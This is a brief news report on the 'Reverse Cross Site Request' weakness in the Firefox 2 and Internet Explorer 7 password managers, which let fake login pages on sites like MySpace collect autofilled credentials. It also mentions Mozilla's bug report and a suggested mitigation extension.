Firefox 2 and Internet Explorer 7 plagued by Security Bugs
A security fault christened Reverse Cross Site Request Vulnerability (RCSR) by Robert Chapin, the detector of the flaw, can actually become a handy weapon for hackers seeking out usernames and their passwords. The main culprit behind this gross security breach is the fact that both Firefox and IE don’t exercise crucial checks on the destination server, the location where the password is forwarded.
In case of Firefox, the main accused is Firefox’s Password Manager Software. This software automatically registers username and password into another login page and thus enables a hacker to create a false login page to access usernames and passwords.
Sites like MYSpace, a social networking site has also experienced such security threat in late October. Such sites are more vulnerable to these types of flaws who incorporate user-made pages like blogs and forums. In case of MySpace, the hacker registered a username with the site and then utilized it to host a fake login page. Thus users who approached MySpace thorough Firefox afterwards had their confidential information traced. Despite such a hitch on such well known reliable site, the Firefox didn’t come up with any safeguards. A bug report has been filed by Mozilla, though no steady solution has yet been evolved. It security experts and software solution teams also suggested that Firefox’s Password Manager should be replaced with the Master Password Timeout extension to lock the master security device after a specific period of idleness.
Source: http://www.earthtimes.org/articles/show/10807.html
|
